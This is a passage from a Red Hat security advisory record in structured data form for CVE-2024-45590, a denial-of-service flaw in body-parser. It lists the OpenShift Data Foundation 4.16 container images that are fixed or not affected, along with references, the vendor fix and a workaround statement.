"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311171", }, ], notes: [ { category: "description", text: "A flaw was found in body-parser. This vulnerability causes denial of service via a specially crafted payload when the URL encoding is enabled.", title: "Vulnerability description", }, { category: "summary", text: "body-parser: Denial of Service Vulnerability in body-parser", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64", ], known_not_affected: [ "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-45590", }, { category: "external", summary: "RHBZ#2311171", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311171", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-45590", url: "https://www.cve.org/CVERecord?id=CVE-2024-45590", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-45590", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-45590", }, { category: "external", summary: "https://github.com/expressjs/body-parser/commit/b2695c4450f06ba3b0ccf48d872a229bb41c9bce", url: "https://github.com/expressjs/body-parser/commit/b2695c4450f06ba3b0ccf48d872a229bb41c9bce", }, { category: "external", summary: "https://github.com/expressjs/body-parser/security/advisories/GHSA-qwcr-r2fm-qrc7", url: "https://github.com/expressjs/body-parser/security/advisories/GHSA-qwcr-r2fm-qrc7", }, ], release_date: "2024-09-10T16:15:21.083000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-15T08:52:38+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8113", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x", 